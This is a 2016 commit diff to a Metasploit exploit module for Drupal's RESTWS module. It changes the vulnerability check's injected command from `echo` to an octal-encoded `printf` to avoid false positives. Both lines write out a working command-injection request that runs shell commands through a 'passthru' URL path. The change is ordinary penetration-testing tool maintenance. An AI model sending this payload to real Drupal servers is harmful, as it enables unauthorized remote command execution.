Fix drupal_restws_exec check method false positive

wvu · wvu · commit c6b309d5c9ef · 2016-07-20T23:28:49.000-05:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}"
       }
     )
     if res && res.body.include?(r)

Original file line number	Diff line number	Diff line change
`@@ -59,7 +59,7 @@ def check`
`59`	`59`	`'method' => 'GET',`
`60`	`60`	`'uri' => normalize_uri(target_uri.path, 'index.php'),`
`61`	`61`	`'vars_get' => {`
`62`		`- 'q' => "taxonomy_vocabulary//passthru/echo #{r}"`
	`62`	`+ 'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}"`
`63`	`63`	`}`
`64`	`64`	`)`
`65`	`65`	`if res && res.body.include?(r)`